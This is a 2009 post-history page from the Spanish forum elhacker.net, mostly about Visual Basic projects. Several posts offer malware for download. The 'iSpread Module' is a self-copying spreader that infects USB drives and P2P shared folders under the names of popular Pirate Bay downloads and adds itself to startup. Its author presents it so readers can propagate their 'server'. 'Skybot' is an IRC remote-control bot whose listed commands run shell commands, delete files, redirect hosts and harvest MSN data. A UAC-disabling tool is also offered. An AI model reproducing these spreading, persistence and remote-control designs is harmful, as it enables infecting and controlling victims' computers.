elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13
41  Programación / Programación Visual Basic / Re: [Pregunta] Redondear Bordes Imagen en: 29 Agosto 2009, 16:46 pm
Hey gracias a todos por las respuestas, ya LeandroA me dejo una muy buena solución para hacerlo... Se los agradezco a todos por la ayuda ;)
42  Programación / Programación Visual Basic / [Pregunta] Redondear Bordes Imagen en: 28 Agosto 2009, 17:00 pm
Pués mi pregunta como dice el titulo es algo como redondear los bordes de las imagenes para que quede algo como esto



Es para un proyecto de Youtube o algo asi es solo para que cuando obtenga las imagenes de las canciones las redondee y quede mas chulo...  ;D
43  Programación / Programación Visual Basic / iUAC Disabler en: 20 Agosto 2009, 21:18 pm
Hola a todos chic@s, pues les cuento que estaba navegando por internet aburrido buscando una función para apagar el UAC, entonces me encontre con un foro que decia como apagar el UAC pero en muchos pasos :p, por lo que me puse a ver como hacer algo bonito para poder apagar el puñetero UAC que nos molesta tanto... Los métodos que hize son muy simples... Lo primero es verificar si tenemos permisos para modificar el registro y si no lo tenemos intentamos darnos esos permisos, luego desabilitamos el mensaje de informacion que sale cuando se desabilita el UAC , finalmente desabilitamos el UAC cambiando el valor en el registro ... Si es algo simple pero efectivo.. Lo he provado en Windows 7 que es el sistema operativo que tengo instalado y ha funcionado perfectamente ;).. Si puedieran probarlo en Windows Vista me harian un gran favor ;)---Saludos a todos y aqui les muestro unas imagenes de como queda :

Foro donde encontre el truco :  http://www.mydigitallife.info/2007/10/02/how-to-shut-off-uac-for-administrator-in-window-vista/





LINK : http://exponelo.com/files/YDWLHXUW/iUac%20Disabler.rar
44  Programación / Programación Visual Basic / Re: Metal Media Player [Exe y Source] en: 19 Agosto 2009, 22:09 pm
Hay veces que es muy molesto usar Option Explicit ya que tienes que declarar todas las variables pero tiene algo bueno ya que si no declaras las variables pueden confundir el tipo y joderse todo el proyecto  :P
45  Programación / Programación Visual Basic / Re: Metal Media Player [Exe y Source] en: 19 Agosto 2009, 12:56 pm
Jeje yo quiero un profe como ese que me de 10 por trabajos como este , "No digo que este mal", pero no creo que este de 10 ^^ te dejo un 6 raspado ;)  :laugh:
46  Programación / Programación Visual Basic / iSpread Module en: 15 Agosto 2009, 05:18 am
Bueno son las 3:56 de la mañana.. algo tarde pero es que he estado trabajando en algo que me ha llevado un buen rato porque he tenido que instalar todos los clientes p2p más usados por las personas para poder obtener las rutas del registro y asi poder patchear las carpetas compartidas de cada una, este modulo que les traigo aqui es un spreader, pero es y no es a la misma vez un simple spreader les explico porque :

* USB Spread : Es una modificación del modulo anterior del iUSB pero con la nueva caracteristica que comprueba si el dispositivo esta listo y asi se pueda autocopiar satisfactoriamente



* P2P Spread : Esta es la parte que más me costo trabajo , por que?

1- Tuve que instalar todos los fucking clientes p2p que ven a continuación



Esa es una imagen de la WMware con los clientes p2p instalados, eso fue necesario para poder obtener las entradas del registro de cada uno de ellos.

2- Como saben casi todos los spreaders que hay por ahi lo que hacen es coger y autocopiarse a la carpeta definida de cada uno de estos clientes, pues este spreader es distinto ya que obtiene la ruta directamente del registro con lo cual si existe el cliente p2p en el pc y el usuario cambio la ruta default del cliente se va a autocopiar de todas formas .

3- Y lo último y mejor... Obtiene los nombres del TOP de 100 Softwares y 100 Juegos más descargados de Thepiratebay y se autocopia con los mismos a las todas las carpetas P2P , si existe el archivo no se copia pero sino pasa algo como esto :





Jaja bonito no...

Y ya al final por aburrimiento le puse un addon para añadirse a las entradas del registro para que quedara algo asi :



..... Pués nada chicos este modulo de spread me ha costado algo de trabajo.. ahora si que no se pueden quejar porque no tienen para propagar su server por todas las redes de internet jeje ... Saludos a todos ;)

Link de descarga : http://exponelo.com/files/QRBIPGCB/iSpread.rar
47  Programación / Programación Visual Basic / Re: Skybot v1.0 (Open Source) en: 1 Agosto 2009, 12:00 pm
Por cierto referente a este tema, me peta por abrir osolo el form1 por lo del msn API=/

Ese es el control de errores de SkyWeb :laugh: :laugh: :laugh:

Joder tio deja la burla ya que tu seas mejor o algo no te da derecho a estar burlandote del trabajo de los demás..
48  Programación / Programación Visual Basic / Re: Skybot v1.0 (Open Source) en: 30 Julio 2009, 19:19 pm
Unas preguntitas...

1-Si quiero mostrar un MsgBox que incluya comas ',' que hago? :laugh:
2-Lo de obtener informacion sobre el Antivirus y tal es con WMI?
3-Lo relacionado con el MSN no funcionara en algunos PCs si usas el MSNAPI...

Por cierto, espero que hayas agregado un buen control de errores.. porque en MiPC personal no iria ni lo de la seguridad ni lo del MSN... asi que imagino que petaria :laugh:

S2 ;)

Cuando salta error no pasa nada, solo lo reporta y sigue no muestra el error ¬¬
49  Programación / Programación Visual Basic / Skybot v1.0 (Open Source) en: 30 Julio 2009, 16:17 pm
Bueno chicos como siempre este es el último proyecto que voy a hacer hasta septiembre que me reintegro pero bueno ya que al parecer a muchos le gustan los bots y esas cosas me he entretenido en hacerles alguna cosita...Estaba pensando en hacer un videotutorial pero creí que esta era la mejor forma ya que un tuto me tomaria mucho tiempo y asi es más fácil y ustedes no pasan trabajo...Bueno sin más rollos se trata de un Bot IRC con el cual ustedes interactuan y dependiendo de los comandos que ustedes seleccionen hace lo que desee... Es algo básico ya que lo hice algo rapido.. Todas las Fuckings lineas estan comentadas pero a la mitad del code me cabrie y solo comente las necesarias :p.. No le puse DDOS porque estoy en contra del DDOS, tampoco le puse que se inicie con Windows porque es solo en modo de pruebas..Los comandos estan en inglés porque molan más que en español... aqui le dejo el pequeño listado de comandos..

Código:
'**************************************************************************************
'
' 1º - .login <Usuario> <Contrseña> ' // Se loguea con el Usuario y Contraseña establecidos
' 2º - .logout ' // Si esta logueado sale de la session
' 3º - .who ' // Saber quien es el admin que esta activo
' 4º - .close ' // Cierra el bot
' 5º - .restart ' // Reinicia el bot
' 6º - .version ' // Obtiene la version del bot
' 7º - .getip ' // Obtiene la IP del Remoto
' 8º - .path ' // Obtiene la Ruta del Bot
' 9º - .join <#Canal> <Contraseña> ' // Cambia canal Actual
' 10º - .changenick ' // Cambia el Nick del Remoto
' 11º - .cmd <Comando> ' // Ejecuta un Comando CMD
' 12º - .run <Ruta del Archivo> ' // Ejecuta un programa
' 13º - .delete <Ruta del Archivo> ' // Elimina un archivo
' 14º - .getclip ' // Obtiene el texto del Portapapeles
' 15º - .setclip <Texto a poner> ' // Pone un Texto en el Portapapeles
' 16º - .surf <Web> ' // Navega en una web seleccionada
' 17º - .mkdir <Ruta> ' // Crea una carpeta
' 18º - .kill <Ruta> ' // Elimina una carpeta
' 19º - .msgbox, <Mensaje> , <Titulo> , <Tipo> ' // Muestra un msgbox... Cuidado tienen que respetar las comas
' 20º - .netinfo ' // Devuelve información de la conexión
' 21º - .secinfo ' // Devuelve informacioón de el Antivirus / Firewall etc
' 22º - .redirect <IP a Redireccionar> <Host> ' // Redirecciona un Host
' 23º - .usb.start ' // Inicia la propagación USB
' 24º - .usb.stop ' // Detiene la propagación USB
' 25º - .sleep <Segundos> ' // Detiene el programa durante la cantidad de segundos deseados
' 26º - .msn.status ' // Obtiene el estado del MSN
' 27º - .msn.email ' // Obtiene el Email del Remoto
' 28º - .msn.friendly ' // Obtiene el Nick del Remoto
' 29º - .msn.add <Email> ' // Añade un Contacto al MSN
'
'**************************************************************************************

Bueno nada es algo simple para que sepan más o menos de que va la cosa ;) ...Saludos y espero que les guste como siempre  :bye:

DESCARGA : http://www.megaupload.com/?d=54GMJYQT
50  Programación / Ingeniería Inversa / Crackme #1 en: 26 Julio 2009, 14:43 pm
Bueno aqui les traido mi primero Crackme no tan dificil ni tampoco tan facil... Usa un pequeño algoritmo para crear una clave unica en cada PC asi que no tienen que buscar una clave en especifico ya que para cada PC la clave es diferente por lo que tendran que descifrar el algoritmo... haber si lo logran crackear.. Cuando lo crackeen dejen una imagen y traten de explicar el algoritmo ;)

Scan : http://www.virustotal.com/es/analisis/ca92236148b2bfb5442eaf1e2636861205dc527572e1710dc130a370b7258917-1248612323

Descarga : http://www.megaupload.com/?d=PLOK3JA3
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines